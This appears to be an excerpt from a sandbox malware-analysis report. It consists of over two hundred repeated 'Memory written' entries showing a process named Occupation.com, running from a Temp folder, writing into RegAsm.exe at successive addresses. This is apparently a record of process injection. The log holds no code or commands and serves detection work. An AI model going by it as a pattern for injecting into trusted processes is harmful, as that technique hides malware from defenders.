Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965CF8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965D5C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965DC0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E24
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965E88
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965EEC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965F50
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965FB4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966018
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96607C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9660E0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966144
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9661A8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96620C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966270
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9662D4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966338
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96639C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966400
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966464
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9664C8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96652C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966590
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9665F4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966658
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9666BC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966720
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966784
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9667E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96684C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9668B0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966914
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966978
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9669DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966A40
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966AA4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966B08
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966B6C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966BD0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966C34
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966C98
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966CFC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966D60
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966DC4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966E28
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966E8C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966EF0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966F54
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 966FB8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96701C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967080
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9670E4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967148
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9671AC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967210
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967274
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9672D8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96733C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9673A0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967404
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967468
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9674CC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967530
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967594
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9675F8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96765C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9676C0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967724
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967788
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9677EC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967850
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9678B4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967918
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96797C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9679E0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967A44
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967AA8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967B0C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967B70
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967BD4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967C38
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967C9C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967D00
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967D64
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967DC8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967E2C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967E90
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967EF4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967F58
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 967FBC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968020
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968084
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9680E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96814C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9681B0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968214
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968278
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9682DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968340
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9683A4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968408
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96846C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9684D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968534
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968598
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9685FC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968660
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9686C4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968728
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96878C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9687F0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968854
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9688B8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96891C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968980
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9689E4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968A48
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968AAC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968B10
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968B74
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968BD8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968C3C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968CA0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968D04
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968D68
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968DCC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968E30
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968E94
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968EF8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968F5C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 968FC0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969024
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969088
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9690EC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969150
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9691B4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969218
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96927C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9692E0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969344
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9693A8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96940C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969470
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9694D4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969538
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96959C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969600
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969664
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9696C8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96972C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969790
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9697F4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969858
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9698BC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969920
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969984
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9699E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969A4C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969AB0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969B14
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969B78
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969BDC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969C40
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969CA4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969D08
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969D6C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969DD0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969E34
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969E98
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969EFC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969F60
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 969FC4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A028
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A08C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A0F0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A154
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A1B8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A21C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A280
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A2E4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A348
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A3AC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A410
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A474
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A4D8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A53C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A5A0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A604
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A668
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A6CC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A730
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A794
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A7F8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A85C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A8C0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A924
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A988
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96A9EC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AA50
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AAB4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96AB18
